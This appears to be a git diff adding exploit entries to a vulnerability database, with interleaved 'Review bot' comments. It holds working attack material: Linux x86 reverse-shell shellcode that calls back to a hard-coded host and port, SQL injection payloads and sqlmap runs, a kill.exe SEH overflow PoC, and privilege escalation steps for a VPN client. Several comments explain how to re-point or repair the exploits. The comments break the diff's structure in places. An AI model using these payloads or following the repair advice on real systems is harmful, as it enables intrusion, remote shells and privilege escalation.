 39710,platforms/php/webapps/39710.txt,"modified eCommerce Shopsoftware 2.0.0.0 rev 9678 - Blind SQL Injection",2016-04-19,"Felix Maduakor",php,webapps,80
 39711,platforms/php/webapps/39711.php,"PHPBack 1.3.0 - SQL Injection",2016-04-20,hyp3rlinx,php,webapps,80
@@ -35940,7 +35940,7 @@ id,file,description,date,author,platform,type,port
 39738,platforms/multiple/webapps/39738.html,"EMC ViPR SRM - Cross-Site Request Forgery",2016-04-27,"Han Sahin",multiple,webapps,58080
 39739,platforms/hardware/webapps/39739.py,"Multiple Vendors (RomPager <= 4.34) - Misfortune Cookie Router Authentication Bypass",2016-04-27,"Milad Doorbash",hardware,webapps,0
 39740,platforms/windows/dos/39740.cpp,"Windows - CSRSS BaseSrvCheckVDM Session 0 Process Creation Privilege Escalation (MS16-048)",2016-04-27,"Google Security Research",windows,dos,0
-39741,platforms/osx/local/39741.txt,"Mach Race OS X Local Privilege Escalation Exploit",2016-04-27,fG!,osx,local,0
+39741,platforms/osx/local/39741.txt,"Mach Race OS X - Local Privilege Escalation Exploit",2016-04-27,fG!,osx,local,0
 39742,platforms/php/remote/39742.txt,"PHP 7.0.5 - ZipArchive::getFrom* Integer Overflow",2016-04-28,"Hans Jerry Illikainen",php,remote,0
 39743,platforms/windows/dos/39743.txt,"Windows Kernel - win32k.sys TTF Processing EBLC / EBSC Tables Pool Corruption (MS16-039)",2016-04-28,"Google Security Research",windows,dos,0
 39744,platforms/php/webapps/39744.html,"Observium 0.16.7533 - Cross Site Request Forgery",2016-04-29,"Dolev Farhi",php,webapps,80
@@ -36047,7 +36047,7 @@ id,file,description,date,author,platform,type,port
 39849,platforms/php/webapps/39849.txt,"XenAPI 1.4.1 for XenForo - Multiple SQL Injections",2016-05-23,"Julien Ahrens",php,webapps,443
 39850,platforms/asp/webapps/39850.txt,"AfterLogic WebMail Pro ASP.NET 6.2.6 - Administrator Account Disclosure via XXE Injection",2016-05-24,"Mehmet Ince",asp,webapps,80
 39851,platforms/lin_x86/shellcode/39851.c,"Linux x86 TCP Bind Shell Port 4444 (656 bytes)",2016-05-25,"Brandon Dennis",lin_x86,shellcode,0
-39852,platforms/java/remote/39852.rb,"Oracle ATS Arbitrary File Upload",2016-05-25,metasploit,java,remote,8088
+39852,platforms/java/remote/39852.rb,"Oracle Application Testing Suite (ATS) - Arbitrary File Upload",2016-05-25,metasploit,java,remote,8088
 39853,platforms/unix/remote/39853.rb,"Ubiquiti airOS Arbitrary File Upload",2016-05-25,metasploit,unix,remote,443
 39854,platforms/java/remote/39854.txt,"PowerFolder Server 10.4.321 - Remote Code Execution",2016-05-25,"Hans-Martin Muench",java,remote,0
 39855,platforms/php/webapps/39855.txt,"Real Estate Portal 4.1 - Multiple Vulnerabilities",2016-05-26,"Bikramaditya Guha",php,webapps,80
@@ -36068,7 +36068,7 @@ id,file,description,date,author,platform,type,port
 39871,platforms/cgi/webapps/39871.txt,"AirOS NanoStation M2 5.6-beta - Multiple Vulnerabilities",2016-05-31,"Pablo Rebolini",cgi,webapps,80
 39872,platforms/php/webapps/39872.txt,"ProcessMaker 3.0.1.7 - Multiple vulnerabilities",2016-05-31,"Mickael Dorigny",php,webapps,80
 39873,platforms/linux/dos/39873.py,"CCextractor 0.80 - Crash PoC",2016-05-31,"David Silveiro",linux,dos,0
-39874,platforms/windows/remote/39874.rb,"Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit)",2016-05-31,"Ian Lovering",windows,remote,0
+39874,platforms/windows/remote/39874.rb,"HP Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit)",2016-05-31,"Ian Lovering",windows,remote,0
 39875,platforms/linux/dos/39875.py,"TCPDump 4.5.1 - Crash PoC",2016-05-31,"David Silveiro",linux,dos,0
 39876,platforms/php/webapps/39876.txt,"AjaxExplorer 1.10.3.2 - Multiple Vulnerabilities",2016-06-01,hyp3rlinx,php,webapps,80
 39877,platforms/multiple/dos/39877.txt,"Wireshark - erf_meta_read_tag SIGSEGV",2016-06-01,"Google Security Research",multiple,dos,0
@@ -36246,3 +36246,12 @@ id,file,description,date,author,platform,type,port
 40067,platforms/linux/remote/40067.rb,"Nagios XI Chained Remote Code Execution",2016-07-06,metasploit,linux,remote,80
 40068,platforms/php/webapps/40068.txt,"OPAC KpwinSQL - Multiple Vulnerabilities",2016-07-07,"Yakir Wizman",php,webapps,80
 40069,platforms/windows/local/40069.cpp,"GE Proficy HMI/SCADA CIMPLICITY 8.2 - Local Privilege Escalation",2016-07-07,"Zhou Yu",windows,local,0
+40070,platforms/php/webapps/40070.txt,"WordPress Lazy Content Slider Plugin 3.4 - (Add Catetory) CSRF",2016-07-08,"Persian Hack Team",php,webapps,80
+40071,platforms/windows/local/40071.txt,"Hide.Me VPN Client 1.2.4 - Privilege Escalation",2016-07-08,sh4d0wman,windows,local,0
+40072,platforms/windows/local/40072.txt,"InstantHMI 6.1 - Privilege Escalation",2016-07-08,sh4d0wman,windows,local,0
+40073,platforms/windows/dos/40073.py,"Microsoft Process Kill Utility (kill.exe) 6.3.9600.17298 - Crash PoC",2016-07-08,hyp3rlinx,windows,dos,0
+40074,platforms/windows/dos/40074.txt,"Microsoft WinDbg logviewer.exe - Crash PoC",2016-07-08,hyp3rlinx,windows,dos,0
+40075,platforms/lin_x86/shellcode/40075.c,"Linux x86 TCP Reverse Shellcode - 75 bytes",2016-07-08,sajith,lin_x86,shellcode,0
+40076,platforms/php/webapps/40076.php,"php Real Estate Script 3 - Arbitrary File Disclosure",2016-07-08,"Meisam Monsef",php,webapps,80
+40077,platforms/xml/webapps/40077.txt,"CyberPower Systems PowerPanel 3.1.2 - XXE Out-Of-Band Data Retrieval",2016-07-08,LiquidWorm,xml,webapps,3052
+40078,platforms/php/webapps/40078.txt,"Streamo Online Radio And TV Streaming CMS - SQL Injection",2016-07-08,N4TuraL,php,webapps,80
diff --git a/platforms/lin_x86/shellcode/40075.c b/platforms/lin_x86/shellcode/40075.c
new file mode 100755
index 000000000..1c2f866f6
--- /dev/null
+++ b/platforms/lin_x86/shellcode/40075.c
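Review bot: The new index row for 40070 misspells the parenthetical, `(Add Catetory)`, and the description column is what the site renders as the exploit title; it should read `"WordPress Lazy Content Slider Plugin 3.4 - (Add Category) CSRF"`. The remaining eight rows are consistent with their advisories as far as this diff shows, e.g. the 3052 port for 40077 matches the `Host: localhost:3052` in that file and "75 bytes" for 40075 matches the byte count in the shellcode header.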
@@ -0,0 +1,177 @@ +/* +# Linux x86 TCP Reverse Shellcode (75 bytes) +# Author: sajith +# Tested on: i686 GNU/Linux +# Shellcode Length: 75 +# SLAE - 750 + +------------c prog ---poc by sajith shetty---------- + +#include +#include +#include +#include + +int main(void) + +{ + +int sock_file_des; +struct sockaddr_in sock_ad; +//[1] create socket connection +//Man page: socket(int domain, int type, int protocol); +sock_file_des = socket(AF_INET, SOCK_STREAM, 0); + + +//[2]connect back to attacker machine (ip= 192.168.227.129) +//Man page: int connect(int sockfd, const struct sockaddr *addr,socklen_t addrlen); + +sock_ad.sin_family = AF_INET; +sock_ad.sin_port = htons(4444); +sock_ad.sin_addr.s_addr = inet_addr("192.168.227.129"); +connect(sock_file_des,(struct sockaddr *) &sock_ad,sizeof(sock_ad)); +//[3]Redirect file descriptors (STDIN, STDOUT and STDERR) to the socket using DUP2 +//Man page: int dup2(int oldfd, int newfd); + +dup2(sock_file_des, 0); // stdin +dup2(sock_file_des, 1); // stdout +dup2(sock_file_des, 2); // stderr + +//[4]Execute shell (here we use /bin/sh) using execve call + +//[*]Man page for execve call +//int execve(const char *filename, char *const argv[],char *const envp[]); + +execve("/bin/sh", 0, 0); +} +----------------------end of c program-------------- + +global _start + +section .text + +_start: + ;[1] create socket connection +;Man page: socket(int domain, int type, int protocol); +;sock_file_des = socket(2,1,0) + + xor edx, edx + push 0x66 ; socket call(0x66) + pop eax + push edx ; protocol = 0 + inc edx + push edx ; sock_stream = 1 + mov ebx, edx ; EBX =1 + inc edx + push edx ; AF_INET =2 + mov ecx, esp ; save the pointer to args in ecx register + int 0x80 ; call socketcall() + + ; int dup2(int oldfd, int newfd); + mov ebx, eax ; store sock_file_des in ebx register + mov ecx, edx ; counter = 2 + loop: + mov al, 0x3f + int 0x80 + dec ecx + jns loop +; sock_ad.sin_family = AF_INET; +;sock_ad.sin_port = htons(4444); 
+;sock_ad.sin_addr.s_addr = inet_addr("192.168.227.129"); +;connect(sock_file_des,(struct sockaddr *) &sock_ad,sizeof(sock_ad)); +xchg ebx, edx ; before xchg edx=2 and ebx=sock_file_des and after xchg ebx=2, edx=sock_file_des + push 0x81e3a8c0 ; sock_ad.sin_addr.s_addr = inet_addr("192.168.227.129"); + push word 0x5C11 ; sock_ad.sin_port = htons(4444); + push word bx ; sock_ad.sin_family = AF_INET =2; + mov ecx, esp ; pointer to struct + + mov al, 0x66 ; socket call (0x66) + inc ebx ; connect (3) + push 0x10 ; sizeof(struct sockaddr_in) + push ecx ; &serv_addr + push edx ; sock_file_des + mov ecx, esp ; save the pointer to args in ecx register + int 0x80 + + mov al, 11 ; execve system call + cdq ; overwriting edx with either 0 (if eax is positive) + push edx ; push null + push 0x68732f6e ; hs/b + push 0x69622f2f ; ib// + mov ebx,esp ; save pointer + push edx ; push null + push ebx ; push pointer + mov ecx,esp ; save pointer + int 0x80 + +-------------obj dump------------ +rev_shell1: file format elf32-i386 + + +Disassembly of section .text: + +08048060 <_start>: + 8048060: 31 d2 xor edx,edx + 8048062: 6a 66 push 0x66 + 8048064: 58 pop eax + 8048065: 52 push edx + 8048066: 42 inc edx + 8048067: 52 push edx + 8048068: 89 d3 mov ebx,edx + 804806a: 42 inc edx + 804806b: 52 push edx + 804806c: 89 e1 mov ecx,esp + 804806e: cd 80 int 0x80 + 8048070: 89 c3 mov ebx,eax + 8048072: 89 d1 mov ecx,edx + +08048074 : + 8048074: b0 3f mov al,0x3f + 8048076: cd 80 int 0x80 + 8048078: 49 dec ecx + 8048079: 79 f9 jns 8048074 + 804807b: 87 da xchg edx,ebx + 804807d: 68 c0 a8 e3 81 push 0x81e3a8c0 + 8048082: 66 68 11 5c pushw 0x5c11 + 8048086: 66 53 push bx + 8048088: 89 e1 mov ecx,esp + 804808a: b0 66 mov al,0x66 + 804808c: 43 inc ebx + 804808d: 6a 10 push 0x10 + 804808f: 51 push ecx + 8048090: 52 push edx + 8048091: 89 e1 mov ecx,esp + 8048093: cd 80 int 0x80 + 8048095: b0 0b mov al,0xb + 8048097: 99 cdq + 8048098: 52 push edx + 8048099: 68 6e 2f 73 68 push 0x68732f6e + 804809e: 68 
2f 2f 62 69 push 0x69622f2f + 80480a3: 89 e3 mov ebx,esp + 80480a5: 52 push edx + 80480a6: 53 push ebx + 80480a7: 89 e1 mov ecx,esp + 80480a9: cd 80 int 0x80 + +----------------------------------------------- +gcc -fno-stack-protector -z execstack shellcode.c -o shellcode +*/ + +#include +#include + +unsigned char code[] = \ + +"\x31\xd2\x6a\x66\x58\x52\x42\x52\x89\xd3\x42\x52\x89\xe1\xcd\x80\x89\xc3\x89\xd1\xb0\x3f\xcd\x80\x49\x79\xf9\x87\xda\x68" +"\xc0\xa8\xe3\x81" //IP address 192.168.227.129 +"\x66\x68" +"\x11\x5c" // port 4444 +"\x66\x53\x89\xe1\xb0\x66\x43\x6a\x10\x51\x52\x89\xe1\xcd\x80\xb0\x0b\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xcd\x80"; + + +main() +{ + printf("Shellcode Length: %d\n", strlen(code)); +int (*ret)() = (int(*)())code; +ret(); +} \ No newline at end of file diff --git a/platforms/php/webapps/40070.txt b/platforms/php/webapps/40070.txt new file mode 100755 index 000000000..bc6e1a770 --- /dev/null +++ b/platforms/php/webapps/40070.txt @@ -0,0 +1,30 @@ +###################### +# Exploit Title : WordPress Lazy content Slider Plugin - CSRF Vulnerability +# Exploit Author : Persian Hack Team +# Vendor Homepage : https://wordpress.org/support/view/plugin-reviews/lazy-content-slider +# Category: [ Webapps ] +# Tested on: [ Win ] +# Version: 3.4 +# Date: 2016/07/08 +###################### +# +# PoC: +# The vulnerable page is +# /wp-content/plugins/lazy-content-slider/lzcs_admin.php +# The Code for CSRF.html is + + +
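Review bot: The harness measures the payload with `strlen(code)` and the connect-back address and port are baked in as raw bytes (`\xc0\xa8\xe3\x81` = 192.168.227.129, `\x11\x5c` = 4444 in network order), so anyone re-pointing it must pick values that contain no 0x00 byte — an IP with a zero octet or a port such as 4352 (0x1100) truncates the string and `ret()` executes a partial payload; a comment on the two annotated lines saying `// must not contain 0x00` would save the next user a debugging session. The `mov al, 0x66` / `mov al, 11` sequence assumes the preceding syscall left the upper 24 bits of eax zero; that holds after the last `dup2` and after a successful `connect`, but if the listener is not up `connect` returns a negative errno, `mov al, 11` yields a bogus syscall number and `cdq` sets `edx = -1` for envp, so the author's "if eax is positive" remark should be promoted to an explicit note that the shellcode has no error path. The driver declares `main()` with an implicit return type, which is invalid C99 and an error under newer GCC defaults — `int main(void)` — and the `#include` lines appear to have lost their header names in this rendering (`printf`/`strlen` need stdio.h and string.h); confirm against the committed file.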
+ + + + +
+ + +# +###################### +# Discovered by : Mojtaba MobhaM +# Greetz : T3NZOG4N & FireKernel & Dr.Askarzade & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R And All Persian Hack Team Members +# Homepage : http://persian-team.ir +###################### \ No newline at end of file diff --git a/platforms/php/webapps/40076.php b/platforms/php/webapps/40076.php new file mode 100755 index 000000000..d0685f44b --- /dev/null +++ b/platforms/php/webapps/40076.php @@ -0,0 +1,35 @@ +# Exploit Title: php Real Estate Script Arbitrary File Disclosure +# Date: 2016-07-08 +# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com +# Vendor Homepage: http://www.realestatescript.eu/ +# Version: v.3 +# Download Link : http://www.realestatescript.eu/downloads/realestatescript-v3.zip + +Exploit : + diff --git a/platforms/php/webapps/40078.txt b/platforms/php/webapps/40078.txt new file mode 100755 index 000000000..09485ff63 --- /dev/null +++ b/platforms/php/webapps/40078.txt 
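Review bot: The advisory names the target script, `/wp-content/plugins/lazy-content-slider/lzcs_admin.php`, but never lists the POST parameters the forged form submits or the action value that reaches the "add category" handler, and the HTML that should follow "The Code for CSRF.html is" is empty in this rendering, so the finding cannot be reproduced from the text — confirm the form survived in the committed file and add a `# Parameters:` line to the header. State the root cause so the fix is obvious: a cross-site POST is accepted presumably because the handler never checks a nonce, and the WordPress remedy is `wp_nonce_field()` in the admin form plus `check_admin_referer()` and a `current_user_can()` capability check before the category is written.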
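Review bot: The header gives product, version and download link but not the vulnerable script or request parameter, and the PHP PoC that should follow `Exploit :` is absent from this rendering, so a defender has nothing to grep for in a deployed copy — add `# Vulnerable file:` and `# Parameter:` lines to the header and confirm the exploit body is present in the committed file. For an arbitrary-file-disclosure bug the advisory should also say whether traversal sequences (`../`) or absolute paths are required, since that decides whether a `basename()`-plus-whitelist fix is sufficient or the file-serving code has to be replaced outright.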
@@ -0,0 +1,55 @@ +###################### +# Application Name : Streamo - Online Radio And Tv Streaming CMS + +# Google Dork : inurl:rjdetails.php?id= + +# Exploit Author : Cyber Warrior | Bug Researchers Group | N4TuraL + +# Author Contact : https://twitter.com/byn4tural + +# Vendor Homepage : http://rexbd.net/ + +# Vulnerable Type : SQL Injection + +# Date : 2016-07-08 + +# Tested on : Windows 10 / Mozilla Firefox +# Linux / Mozilla Firefox +# Linux / sqlmap 1.0.6.28#dev + +###################### SQL Injection Vulnerability ###################### + +# Location : +http://localhost/[path]/menu.php +http://localhost/[path]/programs.php +http://localhost/[path]/rjdetails.php + +###################### + +# Vulnerable code : + +$gid = $_GET["id"]; + + +###################### + +# PoC Exploit: + +http://localhost/[path]/programs.php?id=999999.9%27%20union%20all%20select%20concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29%20as%20char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536%20and%20%27x%27%3D%27x + +# Exploit Code via sqlmap: + +sqlmap -u http://localhost/[path]/programs.php?id=10 --dbs + +Parameter: id (GET) + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 AND time-based blind + Payload: id=10' AND SLEEP(5) AND 'yTqi'='yTqi + + Type: UNION query + Title: Generic UNION query (NULL) - 2 columns + Payload: id=-4222' UNION ALL SELECT NULL,CONCAT(0x7170787871,0x586d5a4275566c486f6f78475a59506c524f5762506944746c7358645a544e527874737478756364,0x7178627071)-- uFiY +--- + +###################### + diff --git a/platforms/windows/dos/40073.py b/platforms/windows/dos/40073.py new file mode 100755 index 000000000..f867cd4d5 --- /dev/null +++ b/platforms/windows/dos/40073.py 
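Review bot: The "Vulnerable code" excerpt stops at `$gid = $_GET["id"];`, which is only the assignment; the defect is the query that interpolates `$gid`, and the sqlmap payloads (`id=10' AND SLEEP(5) AND 'yTqi'='yTqi`) show the value is embedded inside a single-quoted SQL string literal, so quote that query line instead. The remediation to recommend is a prepared statement — `$stmt = $db->prepare('... WHERE id = ?'); $stmt->bind_param('i', $gid);` — or, since every listed endpoint appears to take a numeric id, at minimum `$gid = (int)$_GET["id"];`. The three endpoints (menu.php, programs.php, rjdetails.php) share the pattern, so the advisory should say the fix must be applied to each.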
@@ -0,0 +1,99 @@ +''' +[+] Credits: HYP3RLINX +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/MS-KILL-UTILITY-BUFFER-OVERFLOW.txt +[+] ISR: ApparitionSec + + +Vendor: +================= +www.microsoft.com + + +Product: +========================================= +Microsoft Process Kill Utility "kill.exe" +File version: 6.3.9600.17298 + +The Kill tool (kill.exe), a tool used to terminate a process, part of the +WinDbg program. + + +Vulnerability Type: +=================== +Buffer Overflow + + +SEH Buffer Overflow @ about 512 bytes + + +Vulnerability Details: +===================== + +Register dump + + +'SEH chain of main thread +Address SE handler +001AF688 kernel32.756F489B +001AFBD8 52525252 +42424242 *** CORRUPT ENTRY *** + + +001BF81C 41414141 AAAA +001BF820 41414141 AAAA +001BF824 41414141 AAAA +001BF828 41414141 AAAA +001BF82C 41414141 AAAA +001BF830 41414141 AAAA +001BF834 909006EB ë Pointer to next SEH record +001BF838 52525252 RRRR SE handler <================ +001BF83C 90909090 +001BF840 90909090 + + +Exploit code(s): +================ + +Python POC. +''' + +junk="A"*508+"RRRR" + +pgm='c:\\Program Files (x86)\\Windows Kits\\8.1\\Debuggers\\x86\\kill.exe ' +subprocess.Popen([pgm, junk], shell=False) + + +''' +Disclosure Timeline: +================================== +Vendor Notification: June 24, 2016 +Vendor reply: Will not security service +July 8, 2016 : Public Disclosure + + +Exploitation Technique: +======================= +Local + + +Severity Level: +================ +Low + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no +warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, +provided that it is not altered except by reformatting it, and +that due credit is given. 
Permission is explicitly given for insertion in +vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the +information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author +prohibits any malicious use of security related information +or exploits by the author or elsewhere. + +HYP3RLINX +''' \ No newline at end of file diff --git a/platforms/windows/dos/40074.txt b/platforms/windows/dos/40074.txt new file mode 100755 index 000000000..272bab0d7 --- /dev/null +++ b/platforms/windows/dos/40074.txt 
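Review bot: The runnable part of the PoC calls `subprocess.Popen` without ever importing the module — nothing between the closing `'''` and `junk=` brings it in — so the script dies with `NameError` before kill.exe is launched; add `import subprocess` above `junk`. The path literal `'c:\\Program Files (x86)\\...\\kill.exe '` ends in a space that becomes part of the executable name when passed as a list element (Popen quotes each list item separately on Windows), so drop the trailing space. The SEH dump shows `RRRR` in the handler slot and `AAAA` below it, matching the `"A"*508+"RRRR"` layout, but the advisory should state plainly that kill.exe is a debugger utility the user runs on their own command line, so no privilege boundary is crossed — which is what the "Low" rating and the vendor's "will not service" reply reflect.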
@@ -0,0 +1,230 @@ +[+] Credits: HYP3RLINX + +[+] Website: hyp3rlinx.altervista.org + +[+] Source: +http://hyp3rlinx.altervista.org/advisories/MS-WINDBG-LOGVIEWER-BUFFER-OVERFLOW.txt + +[+] ISR: ApparitionSec + + +Vendor: +================= +www.microsoft.com + + +Product: +==================== +WinDbg logviewer.exe + +LogViewer (logviewer.exe), a tool that displays the logs created, part of +WinDbg application. + + +Vulnerability Type: +=================== +Buffer Overflow DOS + + +Vulnerability Details: +===================== + +Buffer overflow in WinDbg "logviewer.exe" when opening corrupted .lgv +files. App crash then Overwrite of MMX registers etc... +this utility belongs to Windows Kits/8.1/Debuggers/x86 + +Read Access Violation / Memory Corruption +Win32 API Log Viewer +6.3.9600.17298 +Windbg x86 +logviewer.exe +Log Viewer 3.01 for x86 + + +(5fb8.32fc): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +*** ERROR: Symbol file could not be found. Defaulted to export symbols for +C:\Windows\syswow64\msvcrt.dll - +eax=013dad30 ebx=005d0000 ecx=00000041 edx=00000000 esi=005d2000 +edi=013dcd30 +eip=754fa048 esp=0009f840 ebp=0009f848 iopl=0 nv up ei pl nz na pe +nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b +efl=00210206 +msvcrt!memmove+0x1ee: +754fa048 660f6f06 movdqa xmm0,xmmword ptr [esi] +ds:002b:005d2000=???????????????????????????????? 
+ +gs 2b +fs 53 +es 2b +ds 2b +edi 136cd30 +esi 7d2000 +ebx 7d0000 +edx 0 +ecx 41 +eax 136ad30 +ebp df750 +eip 754fa048 +cs 23 +efl 210206 +esp df748 +ss 2b +dr0 0 +dr1 0 +dr2 0 +dr3 0 +dr6 0 +dr7 0 +di cd30 +si 2000 +bx 0 +dx 0 +cx 41 +ax ad30 +bp f750 +ip a048 +fl 206 +sp f748 +bl 0 +dl 0 +cl 41 +al 30 +bh 0 +dh 0 +ch 0 +ah ad +fpcw 27f +fpsw 4020 +fptw ffff +fopcode 0 +fpip 76454c1e +fpipsel 23 +fpdp 6aec2c +fpdpsel 2b +st0 -1.00000000000000e+000 +st1 -1.00000000000000e+000 +st2 -1.00000000000000e+000 +st3 9.60000000000000e+001 +st4 1.08506945252884e-004 +st5 -1.00000000000000e+000 +st6 0.00000000000000e+000 +st7 0.00000000000000e+000 +mm0 0:2:2:2 +mm1 0:0:2:202 +mm2 0:1:1:1 +mm3 c000:0:0:0 +mm4 e38e:3900:0:0 +mm5 0:0:0:0 +mm6 0:0:0:0 +mm7 0:0:0:0 +mxcsr 1fa0 +xmm0 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001 +xmm1 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001 +xmm2 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001 +xmm3 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001 +xmm4 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001 +xmm5 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001 +xmm6 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001 +xmm7 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001 +iopl 0 +of 0 +df 0 +if 1 +tf 0 +sf 0 +zf 0 +af 0 +pf 1 +cf 0 +vip 0 +vif 0 +xmm0l 4141:4141:4141:4141 +xmm1l 4141:4141:4141:4141 +xmm2l 4141:4141:4141:4141 +xmm3l 4141:4141:4141:4141 +xmm4l 4141:4141:4141:4141 +xmm5l 4141:4141:4141:4141 +xmm6l 4141:4141:4141:4141 +xmm7l 4141:4141:4141:4141 +xmm0h 4141:4141:4141:4141 +xmm1h 4141:4141:4141:4141 +xmm2h 4141:4141:4141:4141 +xmm3h 4141:4141:4141:4141 +xmm4h 4141:4141:4141:4141 +xmm5h 4141:4141:4141:4141 +xmm6h 4141:4141:4141:4141 +xmm7h 4141:4141:4141:4141 +xmm0/0 41414141 +xmm0/1 41414141 +xmm0/2 41414141 +xmm0/3 41414141 +xmm1/0 41414141 +xmm1/1 41414141 +xmm1/2 41414141 +xmm1/3 41414141 +xmm2/0 41414141 +xmm2/1 41414141 +xmm2/2 41414141 +xmm2/3 
41414141 +xmm3/0 41414141 +xmm3/1 41414141 +xmm3/2 41414141 +xmm3/3 41414141 +xmm4/0 41414141 +xmm4/1 41414141 +xmm4/2 41414141 +xmm4/3 41414141 +xmm5/0 41414141 +xmm5/1 41414141 +xmm5/2 41414141 +xmm5/3 41414141 +xmm6/0 41414141 +xmm6/1 41414141 +xmm6/2 41414141 +xmm6/3 41414141 +xmm7/0 41414141 +xmm7/1 41414141 +xmm7/2 41414141 +xmm7/3 41414141 + + +Exploit code(s): +=============== + +1) create .lgv file with bunch of 'A's length of 4096 overwrites XXM +registers, ECX etc +2) run from command line pipe the file to it to watch it crash and burn. + +/////////////////////////////////////////////////////////////////////// + + +Disclosure Timeline: +=============================== +Vendor Notification: June 23, 2016 +Vendor acknowledged: July 1, 2016 +Vendor reply: Will not fix (stability issue) +July 8, 2016 : Public Disclosure + + +Severity Level: +================ +Low + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no +warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, +provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in +vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the +information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author +prohibits any malicious use of security related information +or exploits by the author or elsewhere. + +HYP3RLINX diff --git a/platforms/windows/local/40071.txt b/platforms/windows/local/40071.txt new file mode 100755 index 000000000..0a33173fc --- /dev/null +++ b/platforms/windows/local/40071.txt 
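Review bot: The "Exploit code(s)" section is two sentences of prose rather than a reproducible PoC, and the two steps disagree on how the input reaches the program ("create .lgv file" versus "pipe the file to it"); a one-liner such as `python -c "open('crash.lgv','wb').write(b'A'*4096)"` followed by the exact `logviewer.exe` invocation would remove the ambiguity — confirm which form actually crashes. The register dump does not support "Overwrite of MMX registers" as an impact statement: the fault is `msvcrt!memmove` reading at `esi=005d2000`, an unmapped page boundary (`ds:002b:005d2000=????`), i.e. a read over-run of the source buffer, and the `0x41414141` values in xmm0–xmm7 are simply the bytes memmove was copying. Describing it as the read access violation the summary line already names keeps the advisory consistent with its own "Low"/DoS rating.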
@@ -0,0 +1,72 @@ +Title: Hide.Me VPN Client - EoP: User to SYSTEM +CWE Class: CWE-276: Incorrect Default Permissions +Date: 01/06/2016 +Vendor: eVenture +Product: Hide.Me VPN Client +Version: 1.2.4 +Download link: https://hide.me/en/software/windows +Tested on: Windows 7 x86, fully patched +Release mode: no bugbounty program, public release + +Installer Name: Hide.me-Setup-1.2.4.exe +MD5: e5e5e2fa2c9592660a180357c4482740 +SHA1: 4729c45d6399c759cd8f6a0c5773e08c6c57e034 + +- 1. Introduction: - +The installer automatically creates a folder named "hide.me VPN" under +c:\program files\ for the software. +No other location can be specified during installation. + +The folder has insecure permissions allowing EVERYONE the WRITE permission. +Users can replace binaries or plant malicious DLLs to obtain elevated privileges. + +As the software is running one executable as service under SYSTEM +permissions an attacker could elevate from regular user to SYSTEM. + +- 2. Technical Details/PoC: - +A. Obtain and execute the installer. +B. Observe there is no prompt to specify an installation location. +C. Review permissions under the Explorer Security tab or run icacls.exe + +Example: + +C:\Program Files\hide.me VPN Everyone:(OI)(CI)(M) + NT SERVICE\TrustedInstaller:(I)(F) + NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F) + NT AUTHORITY\SYSTEM:(I)(F) + NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F) + BUILTIN\Administrators:(I)(F) + BUILTIN\Administrators:(I)(OI)(CI)(IO)(F) + BUILTIN\Users:(I)(RX) + BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE) + CREATOR OWNER:(I)(OI)(CI)(IO)(F) + +Successfully processed 1 files; Failed processing 0 files + +C. A user can overwrite an executable or drop a malicious DLL to obtain code execution. +The highest permissions are reached by overwriting the service executable: vpnsvc.exe + +However it is running at startup and can't be stopped by a non-privileged user. 
+ +As we can write to the directory we can rename all of the DLL's to DLL.old + +C:\Program Files\hide.me VPN\Common.dll +C:\Program Files\hide.me VPN\SharpRaven.dll +C:\Program Files\hide.me VPN\ComLib.dll +C:\Program Files\hide.me VPN\vpnlib.dll +C:\Program Files\hide.me VPN\Newtonsoft.Json.dll +C:\Program Files\hide.me VPN\DotRas.dll + +Once renamed, reboot the machine, log on as normal user. + +E. Observe both application AND the system service have crashed. +Now replace vpnsvc.exe with a malicious copy. +Place back all original DLLS and reboot. + +Our code will get executed under elevated permissions: SYSTEM. + +- 3. Mitigation: - +A. set appropriate permissions on the application folder. + +- 4. Author: - +sh4d0wman diff --git a/platforms/windows/local/40072.txt b/platforms/windows/local/40072.txt new file mode 100755 index 000000000..ecc190a47 --- /dev/null +++ b/platforms/windows/local/40072.txt 
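Review bot: The icacls output shows `Everyone:(OI)(CI)(M)` without the `(I)` flag, so the installer grants Modify explicitly rather than inheriting it from `C:\Program Files`; the mitigation should therefore say the fix belongs in the installer's ACL step (remove that ACE and let the folder inherit the default Program Files permissions, which the other listed entries already show) rather than only "set appropriate permissions". The step labels run A, B, C, C, E — the second `C.` should be `D.`. The PoC relies on a reboot after renaming the DLLs so that `vpnsvc.exe` is replaced while the service is down; say so explicitly, since a reader may otherwise try to overwrite the running service binary, which normally fails with a sharing violation while the image is loaded.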
